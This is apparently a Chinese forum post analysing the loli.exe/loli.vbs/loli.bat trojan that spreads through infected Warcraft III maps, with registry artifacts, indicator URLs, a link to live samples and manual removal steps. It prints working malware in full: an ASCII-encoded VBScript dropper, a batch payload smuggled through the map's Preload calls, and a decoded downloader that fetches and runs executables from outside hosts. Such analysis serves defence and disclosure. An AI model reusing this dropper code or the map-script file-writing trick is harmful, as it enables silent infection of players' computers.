关于近期很多人感染的木马病毒：loli.exe / loli.vbs / loli.bat
受感染的基本上都是在腾讯对战平台玩魔兽争霸3（War3）的用户。
症状：开机时提示新增自启动项 loli.exe，并由启动项自动运行 loli.bat；
C 盘根目录出现 loli.exe、loli.vbs、loli.bat。QQ电脑管家、360杀毒都只能检出异常启动项并删除，但没有用：只要再进一次被感染的地图，这几个文件就会被重新生成（生成机制见下文的 loli.bat 分析）。提交给管家，呵呵，所谓的 NO.1 软件；论坛管理直接把帖子扔进灌水区，无人处理。
然后我们来看一下这三个文件
链接: http://pan.baidu.com/s/1sl6ct7R 密码: 6xbu （注意：压缩包里是活的恶意样本，只在隔离的虚拟机里分析，不要在日常使用的电脑上解压或运行。）
loli.exe
' loli.vbs, stage 1: the real script is stored as a comma-separated list of
' ASCII codes and is only turned back into text at run time by ChrData, so the
' plain-text URL and CreateObject calls never appear in the file (presumably to
' dodge string-based AV signatures).
' Decoding the list by hand gives:
'   Set Post = CreateObject("Msxml2.ServerXMLHTTP.3.0")
'   Set Shell = CreateObject("Wscript.Shell")
'   Post.Open "GET","http://www.loxve.com/loli.bat",0
'   Post.Send()
'   Set aGet = CreateObject("ADODB.Stream")
'   aGet.Mode = 3
'   aGet.Type = 1
'   aGet.Open()
'   aGet.Write(Post.responseBody)
'   aGet.SaveToFile "c:\loli.bat",2
'   wscript.sleep 1000
'   Shell.Run ("c:\loli.bat")
' i.e. this stage re-downloads loli.bat from loxve.com and runs it, which is
' what closes the bat -> vbs -> bat re-infection loop. The install.exe script
' shown further down this page is the same downloader with a different URL
' and target file name.
loli.vbs - data="83,101,116,32,80,111,115,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,83,101,114,118,101,114,88,77,76,72,84,84,80,46,51,46,48,34,41,13,10,83,101,116,32,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,119,119,119,46,108,111,120,118,101,46,99,111,109,47,108,111,108,105,46,98,97,116,34,44,48,13,10,80,111,115,116,46,83,101,110,100,40,41,13,10,83,101,116,32,97,71,101,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,13,10,97,71,101,116,46,77,111,100,101,32,61,32,51,13,10,97,71,101,116,46,84,121,112,101,32,61,32,49,13,10,97,71,101,116,46,79,112,101,110,40,41,32,13,10,97,71,101,116,46,87,114,105,116,101,40,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,97,71,101,116,46,83,97,118,101,84,111,70,105,108,101,32,34,99,58,92,108,111,108,105,46,98,97,116,34,44,50,13,10,119,115,99,114,105,112,116,46,115,108,101,101,112,32,49,48,48,48,32,13,10,83,104,101,108,108,46,82,117,110,32,40,34,99,58,92,108,111,108,105,46,98,97,116,34,41"
' ChrData is truncated here by the forum paste; its full body (Split the list
' on "," and append Chr() of each value) is visible inside the loli.bat
' listing below, which is the code that writes this file.
- Function ChrData(Data)
loli.bat
rem loli.bat as dumped from an infected map: the batch payload is wrapped in a
rem Warcraft III JASS "PreloadFiles" function, i.e. the map's script hands the
rem text to Preload() and the game writes it out as this file. When cmd.exe
rem later runs the file, the JASS lines (function, call Preload(, endfunction)
rem are not commands; those carrying a 2>nul redirect have their "is not
rem recognized" error discarded, the first two should just print an error and
rem execution continues with the next line.
- function PreloadFiles takes nothing returns nothing
- call Preload( "
- echo off
rem Remove any stale copy so the appends below start from an empty file.
- del "c:/loli.vbs"
- cls
rem "set /p=TEXT<nul" prints TEXT without a trailing newline; with >>c:/loli.vbs
rem each call appends one fragment of the comma-separated ASCII list (decoded
rem in the loli.vbs section above) to the script being rebuilt. The list is
rem split across several Preload() strings, presumably because one JASS string
rem cannot hold the whole payload -- confirm against the Preload length limit.
rem ^" escapes the opening double quote so cmd does not treat it as a quote.
- set /p=data=^"83,101,116,32,80,111,115,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,83,101,114,118,101,114,88,77,76,72,84,84,80,46,51,46,48,34,41,13,10,<nul>>c:/loli.vbs
- 2>nul " )
- call Preload( " "2>nul
- set /p=83,101,116,32,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,<nul>>c:/loli.vbs
- 2>nul " )
- call Preload( " "2>nul
- set /p= 116,112,58,47,47,119,119,119,46,108,111,120,118,101,46,99,111,109,47,108,111,108,105,46,98,97,116,34,44,48,13,10,80,111,115,116,46,83,101,110,100,40,41,13,10,83,101,116,32,97,71,101,116,32,61,32,67,114,101,97,116,101<nul>>c:/loli.vbs
- 2>nul " )
- call Preload( " "2>nul
- set /p= ,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,13,10,97,71,101,116,46,77,111,100,101,32,61,32,51,13,10,97,71,101,116,46,84,121,112,101,32,61,32,49,13,10,97,71,101,116,46,79,112,101,110,40,<nul>>c:/loli.vbs
- 2>nul " )
- call Preload( " "2>nul
- set /p=41,32,13,10,97,71,101,116,46,87,114,105,116,101,40,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,97,71,101,116,46,83,97,118,101,84,111,70,105,108,101,32,34,99,58,92,108,111,108,105,46,98,<nul>>c:/loli.vbs
- 2>nul " )
- call Preload( " "2>nul
rem From here on plain "echo" appends are used because newlines are wanted:
rem the tail of the list plus its closing quote, then the ChrData helper that
rem turns each number back into a character with Chr().
- >>c:/loli.vbs echo 97,116,34,44,50,13,10,119,115,99,114,105,112,116,46,115,108,101,101,112,32,49,48,48,48,32,13,10,83,104,101,108,108,46,82,117,110,32,40,34,99,58,92,108,111,108,105,46,98,97,116,34,41"
- echo Function ChrData(Data)>>c:/loli.vbs
- 2>nul" )
- call Preload( " "2>nul
- >>c:/loli.vbs echo MyArray = Split(Data, ",", -1, 1)
- >>c:/loli.vbs echo For each OldData in MyArray
rem ^& escapes the VBScript concatenation operator from cmd's command separator.
- >>c:/loli.vbs echo Newdata=NewData^&chr(OldData)
- >>c:/loli.vbs echo Next
- >>c:/loli.vbs echo ChrData=NewData
- 2>nul " )
- call Preload( " "2>nul
- >>c:/loli.vbs echo End Function
rem 30 s delay before decoding (purpose not stated; looks like a sandbox/AV
rem evasion delay -- unverified), then the decoded text is run via Execute.
- >>c:/loli.vbs echo wscript.sleep 30000
- >>c:/loli.vbs echo execute Chrdata(data)
rem Launch the rebuilt dropper in its own process and leave.
- start c:/loli.vbs
- exit
- " )
- call PreloadEnd( 0.0 )
- endfunction
install.exe（运行后会自动删除，作者观察所得）。下面是下载并运行它的 VBS 脚本，逻辑与上面解码后的 loli.vbs 完全相同，只是换了下载地址和落地文件名：
' Decoded dropper stage: this copy fetches install.exe and saves it as
' c:\loli.exe (the encoded copy inside loli.vbs fetches loli.bat the same
' way). Runs under wscript.exe. ServerXMLHTTP is the server-side MSXML
' object, which is not bound by the IE security-zone checks that XMLHTTP is.
- Set Post = CreateObject("Msxml2.ServerXMLHTTP.3.0")
- Set Shell = CreateObject("Wscript.Shell")
' Synchronous GET (third argument 0) over plain HTTP from a clouddn.com CDN
' host. Nothing checks Post.status, so a 404/error page would be written to
' c:\loli.exe and run just the same.
- Post.Open "GET","http://og3nhp3ql.bkt.clouddn.com/install.exe",0
- Post.Send()
' ADODB.Stream in binary mode (Type = 1 adTypeBinary, Mode = 3 read/write)
' writes the raw response body to disk; SaveToFile option 2 overwrites any
' existing file.
- Set aGet = CreateObject("ADODB.Stream")
- aGet.Mode = 3
- aGet.Type = 1
- aGet.Open()
- aGet.Write(Post.responseBody)
- aGet.SaveToFile "c:\loli.exe",2
' 1 s pause before execution (reason not stated; presumably to let the file
' handle close), then the downloaded binary is launched.
- wscript.sleep 1000
- Shell.Run ("c:\loli.exe")
来源自 www.loxve.com/app/War3_UnHack/client.txt，内容为：`933007781419441EED18A8122D84F5F5#http://og3nhp3ql.bkt.clouddn.com/War3_UnHack.asi`（看起来是"校验值#下载地址"格式的更新清单，推测 loli.exe/install.exe 据此拉取 War3_UnHack.asi）。
很明显跟 War3（魔兽争霸3：冰封王座，暴雪的游戏）有关。大部分用户在腾讯对战平台进入游戏地图后，会自动刷出 N 条类似如下的广告：
- 生活化狂潮....(WAR3的地图名字)..包含作弊脚本:火龙HKE
可见作者跟"火龙"这个外挂脚本有关，也跟 loxve.com 的站长有关。=========================
install.exe 的自动运行及其它行为：在注册表里（运行 regedit 或在 CMD 下查找）可以找到以下键值。其中 PendingFileRenameOperations 是 Windows 用来在下次重启时改名/删除文件的机制（MoveFileEx 的延迟操作），这里指向 %temp% 下的一个临时文件：
- HKEY_CURRENT_USER\\Software\Microsoft\GDIPlus
- [FontCachePath] = [%USERPROFILE%\Local Settings\Application Data]
- HKEY_LOCAL_MACHINE\\SYSTEM\ControlSet001\Control\Session Manager
- [PendingFileRenameOperations] = [\??\%temp%\_@17.tmp]
- HKEY_LOCAL_MACHINE\\SYSTEM\CurrentControlSet\Control\Session Manager
- [PendingFileRenameOperations] = [\??\%temp%\_@17.tmp]
另外，我把样本下载到 D:\Down 目录下测试，结果以下路径都出现了（注意第二条：loli.bat 被放进了所有用户共用的启动目录，这就是开机自启动的来源）：
- \??\C:\loli.exe
- \??\C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\loli.bat
- \??\D:\Down\loli virus test\download\install.exe
C:\Users\Administrator
C:\Users\Administrator\AppData\Local\Temp\
C:\Users\Administrator\AppData\Local\Temp\
手动删除
A，先结束 loli.exe 进程，然后找到魔兽 War3 安装目录下的 Warcraft\redist\miles\War3_UnHack.asi 并删除（推测这个 .asi 是被游戏的 Miles 音频库当作插件加载的）；再删除 C 盘根目录的 loli.exe、loli.vbs、loli.bat，以及启动目录里的 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\loli.bat。
B，删除所有被感染的地图。地图文件已经全部被改写，内置了上面那段生成 loli.bat 的 JASS 代码，所以必须删除；如果有魔兽安装包，也可以直接彻底删除整个 War3 目录后重装。注意：即使清理干净，只要再进一张被感染的地图就会被重新感染，所以地图来源要谨慎。
地图目录在您的魔兽安装目录下的 Warcraft\maps\ 里面。
目前作者可能自己也感觉到感染面过大，估计怕引发法律纠纷，于是声明该病毒没有任何危害性，只是用来检测进入房间的地图是否含有作弊脚本，并主动提供了清除工具。
但这种做法是未经允许强制进入他人电脑，并把被感染的机器当作二次传染源，已经走向了危险的一步。这个漏洞（从上面 loli.bat 的结构看，是地图脚本借 Preload 往磁盘写文件）既然早已被人发现，为什么其它人不去利用？
http://og3nhp3ql.bkt.clouddn.com/loli.exe （IOC 记录，请勿直接下载运行）
最后说一句：病毒作者可能是个萝莉控，还跑去玩易语言。强制感染、自动群发广告，说是为了抵制作弊，却不停群发火龙的广告，等于在帮火龙做广告，让更多人去用脚本；被感染的人继续群发火龙广告，更多人去搜索下载作弊脚本，恶性循环。不是火龙的亲戚么？